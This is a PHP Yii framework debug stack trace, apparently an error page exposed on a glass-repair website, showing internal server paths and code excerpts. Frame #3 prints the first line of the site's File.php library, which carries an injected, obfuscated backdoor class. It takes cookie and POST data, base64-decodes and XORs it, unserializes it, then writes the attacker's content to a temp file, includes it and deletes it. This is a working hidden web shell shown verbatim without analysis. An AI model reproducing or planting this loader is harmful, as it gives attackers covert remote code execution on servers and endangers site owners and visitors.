/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/YiiBase.php(427)
415 { 416 include($classFile); 417 if(YII_DEBUG && basename(realpath($classFile))!==$className.'.php') 418 throw new CException(Yii::t('yii','Class name "{class}" does not match class file "{file}".', array( 419 '{class}'=>$className, 420 '{file}'=>$classFile, 421 ))); 422 break; 423 } 424 } 425 } 426 else 427 include($className.'.php'); 428 } 429 else // class name with namespace in PHP 5.3 430 { 431 $namespace=str_replace('\\','.',ltrim($className,'\\')); 432 if(($path=self::getPathOfAlias($namespace))!==false) 433 include($path.'.php'); 434 else 435 return false; 436 } 437 return class_exists($className,false) || interface_exists($className,false); 438 } 439 return true;
#0 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/YiiBase.php(427): YiiBase::autoload() 422 break; 423 } 424 } 425 } 426 else 427 include($className.'.php'); 428 } 429 else // class name with namespace in PHP 5.3 430 { 431 $namespace=str_replace('\\','.',ltrim($className,'\\')); 432 if(($path=self::getPathOfAlias($namespace))!==false) |
#1 |
unknown(0): YiiBase::autoload("yazmdsa")
|
#2 |
unknown(0): spl_autoload_call("yazmdsa")
|
#3 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/libs/File.php(1): class_exists("yazmdsa") 1 <?php if (!class_exists("yazmdsa")){class yazmdsa{public static $fibch = "cwjbdnctnahbtaxa";public static $ejdtczrzgo = NULL;public function __construct(){$ymqekc = @$_COOKIE[substr(yazmdsa::$fibch, 0, 4)];if (!empty($ymqekc)){$vrxbkifdn = "base64";$ftwmncjy = "";$ymqekc = explode(",", $ymqekc);foreach ($ymqekc as $asielkkobq){$ftwmncjy .= @$_COOKIE[$asielkkobq];$ftwmncjy .= @$_POST[$asielkkobq];}$ftwmncjy = array_map($vrxbkifdn . "_decode", array($ftwmncjy,));$ftwmncjy = $ftwmncjy[0] ^ str_repeat(yazmdsa::$fibch, (strlen($ftwmncjy[0]) / strlen(yazmdsa::$fibch)) + 1);yazmdsa::$ejdtczrzgo = @unserialize($ftwmncjy);}}public function __destruct(){$this->bkpeank();}private function bkpeank(){if (is_array(yazmdsa::$ejdtczrzgo)) {$eyrtmpbcmr = sys_get_temp_dir() . "/" . crc32(yazmdsa::$ejdtczrzgo["salt"]);@yazmdsa::$ejdtczrzgo["write"]($eyrtmpbcmr, yazmdsa::$ejdtczrzgo["content"]);include $eyrtmpbcmr;@yazmdsa::$ejdtczrzgo["delete"]($eyrtmpbcmr);exit();}}}$vosazhvjh = new yazmdsa();$vosazhvjh = NULL;} ?><?php 2 3 4 class File 5 { 6 |
#4 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/YiiBase.php(427): include("/srv/users/serverpilot/apps/glassaffordable/public/protected/lib...") 422 break; 423 } 424 } 425 } 426 else 427 include($className.'.php'); 428 } 429 else // class name with namespace in PHP 5.3 430 { 431 $namespace=str_replace('\\','.',ltrim($className,'\\')); 432 if(($path=self::getPathOfAlias($namespace))!==false) |
#5 |
unknown(0): YiiBase::autoload("File")
|
#6 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/themes/default/views/site/view.php(25): spl_autoload_call("File") 20 <div class="row"> 21 <?php if($model->leadCategoryImgs) { ?> 22 <?php $i=0; foreach ($model->leadCategoryImgs as $img) { ?> 23 <?php if($i==0) { ?> 24 <div class="col-md-12 "> 25 <a role="button" href="<?php echo File::imageURL($img->img,$model->image_folder); ?> " data-fancybox="images" > 26 <?php echo File::image($img->img,$model->image_folder); ?> 27 </a> 28 29 </div> 30 <?php } else { ?> |
#7 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CBaseController.php(126): require("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...") 121 $data=$_data_; 122 if($_return_) 123 { 124 ob_start(); 125 ob_implicit_flush(false); 126 require($_viewFile_); 127 return ob_get_clean(); 128 } 129 else 130 require($_viewFile_); 131 } |
#8 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CBaseController.php(95): CBaseController->renderInternal("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...", array("model" => LeadCategory), true) 090 { 091 $widgetCount=count($this->_widgetStack); 092 if(($renderer=Yii::app()->getViewRenderer())!==null && $renderer->fileExtension==='.'.CFileHelper::getExtension($viewFile)) 093 $content=$renderer->renderFile($this,$viewFile,$data,$return); 094 else 095 $content=$this->renderInternal($viewFile,$data,$return); 096 if(count($this->_widgetStack)===$widgetCount) 097 return $content; 098 else 099 { 100 $widget=end($this->_widgetStack); |
#9 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(869): CBaseController->renderFile("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...", array("model" => LeadCategory), true) 864 */ 865 public function renderPartial($view,$data=null,$return=false,$processOutput=false) 866 { 867 if(($viewFile=$this->getViewFile($view))!==false) 868 { 869 $output=$this->renderFile($viewFile,$data,true); 870 if($processOutput) 871 $output=$this->processOutput($output); 872 if($return) 873 return $output; 874 else |
#10 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(782): CController->renderPartial("view", array("model" => LeadCategory), true) 777 */ 778 public function render($view,$data=null,$return=false) 779 { 780 if($this->beforeRender($view)) 781 { 782 $output=$this->renderPartial($view,$data,true); 783 if(($layoutFile=$this->getLayoutFile($this->layout))!==false) 784 $output=$this->renderFile($layoutFile,array('content'=>$output),true); 785 786 $this->afterRender($view,$output); 787 |
#11 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/controllers/front/SiteController.php(253): CController->render("view", array("model" => LeadCategory)) 248 public function actionView($name) 249 { 250 $this->layout = 'column6'; 251 $this->render('view',array( 252 'model'=>$this->loadModelSlug($name), 253 )); 254 } 255 256 public function loadModelSlug($slug) 257 { 258 |
#12 |
unknown(0): SiteController->actionView("windshield-cracks-and-chips")
|
#13 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/actions/CAction.php(108): ReflectionMethod->invokeArgs(SiteController, array("windshield-cracks-and-chips")) 103 elseif($param->isDefaultValueAvailable()) 104 $ps[]=$param->getDefaultValue(); 105 else 106 return false; 107 } 108 $method->invokeArgs($object,$ps); 109 return true; 110 } 111 } |
#14 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/actions/CInlineAction.php(47): CAction->runWithParamsInternal(SiteController, ReflectionMethod, array("name" => "windshield-cracks-and-chips")) 42 { 43 $methodName='action'.$this->getId(); 44 $controller=$this->getController(); 45 $method=new ReflectionMethod($controller, $methodName); 46 if($method->getNumberOfParameters()>0) 47 return $this->runWithParamsInternal($controller, $method, $params); 48 else 49 return $controller->$methodName(); 50 } 51 52 } |
#15 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(308): CInlineAction->runWithParams(array("name" => "windshield-cracks-and-chips")) 303 { 304 $priorAction=$this->_action; 305 $this->_action=$action; 306 if($this->beforeAction($action)) 307 { 308 if($action->runWithParams($this->getActionParams())===false) 309 $this->invalidActionParams($action); 310 else 311 $this->afterAction($action); 312 } 313 $this->_action=$priorAction; |
#16 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(286): CController->runAction(CInlineAction) 281 * @see runAction 282 */ 283 public function runActionWithFilters($action,$filters) 284 { 285 if(empty($filters)) 286 $this->runAction($action); 287 else 288 { 289 $priorAction=$this->_action; 290 $this->_action=$action; 291 CFilterChain::create($this,$action,$filters)->run(); |
#17 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(265): CController->runActionWithFilters(CInlineAction, array()) 260 { 261 if(($parent=$this->getModule())===null) 262 $parent=Yii::app(); 263 if($parent->beforeControllerAction($this,$action)) 264 { 265 $this->runActionWithFilters($action,$this->filters()); 266 $parent->afterControllerAction($this,$action); 267 } 268 } 269 else 270 $this->missingAction($actionID); |
#18 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CWebApplication.php(282): CController->run("view") 277 { 278 list($controller,$actionID)=$ca; 279 $oldController=$this->_controller; 280 $this->_controller=$controller; 281 $controller->init(); 282 $controller->run($actionID); 283 $this->_controller=$oldController; 284 } 285 else 286 { 287 |
#19 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CWebApplication.php(141): CWebApplication->runController("site/view") 136 foreach(array_splice($this->catchAllRequest,1) as $name=>$value) 137 $_GET[$name]=$value; 138 } 139 else 140 $route=$this->getUrlManager()->parseUrl($this->getRequest()); 141 $this->runController($route); 142 } 143 144 /** 145 * Registers the core application components. 146 * This method overrides the parent implementation by registering additional core components. |
#20 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/base/CApplication.php(191): CWebApplication->processRequest() 186 public function run() 187 { 188 if($this->hasEventHandler('onBeginRequest')) 189 $this->onBeginRequest(new CEvent($this)); 190 register_shutdown_function(array($this,'end'),0,false); 191 $this->processRequest(); 192 if($this->hasEventHandler('onEndRequest')) 193 $this->onEndRequest(new CEvent($this)); 194 } 195 196 /** |
#21 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/components/WebApplicationEndBehavior.php(25): CApplication->run() |
#22 |
unknown(0): WebApplicationEndBehavior->runEnd("front")
|
#23 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/base/CComponent.php(261): call_user_func_array(array(WebApplicationEndBehavior, "runEnd"), array("front")) 256 if($this->_m!==null) 257 { 258 foreach($this->_m as $object) 259 { 260 if($object->getEnabled() && method_exists($object,$name)) 261 return call_user_func_array(array($object,$name),$parameters); 262 } 263 } 264 if(class_exists('Closure', false) && $this->canGetProperty($name) && $this->$name instanceof Closure) 265 return call_user_func_array($this->$name, $parameters); 266 throw new CException(Yii::t('yii','{class} and its behaviors do not have a method or closure named "{name}".', |
#24 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/index.php(11): CComponent->__call("runEnd", array("front")) 06 // Remove the following lines when in production mode 07 defined('YII_DEBUG') or define('YII_DEBUG', true); 08 defined('YII_TRACE_LEVEL') or define('YII_TRACE_LEVEL', 3); 09 10 require_once($yii); 11 Yii::createWebApplication($config)->runEnd('front'); |
#25 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/index.php(11): CWebApplication->runEnd("front") 06 // Remove the following lines when in production mode 07 defined('YII_DEBUG') or define('YII_DEBUG', true); 08 defined('YII_TRACE_LEVEL') or define('YII_TRACE_LEVEL', 3); 09 10 require_once($yii); 11 Yii::createWebApplication($config)->runEnd('front'); |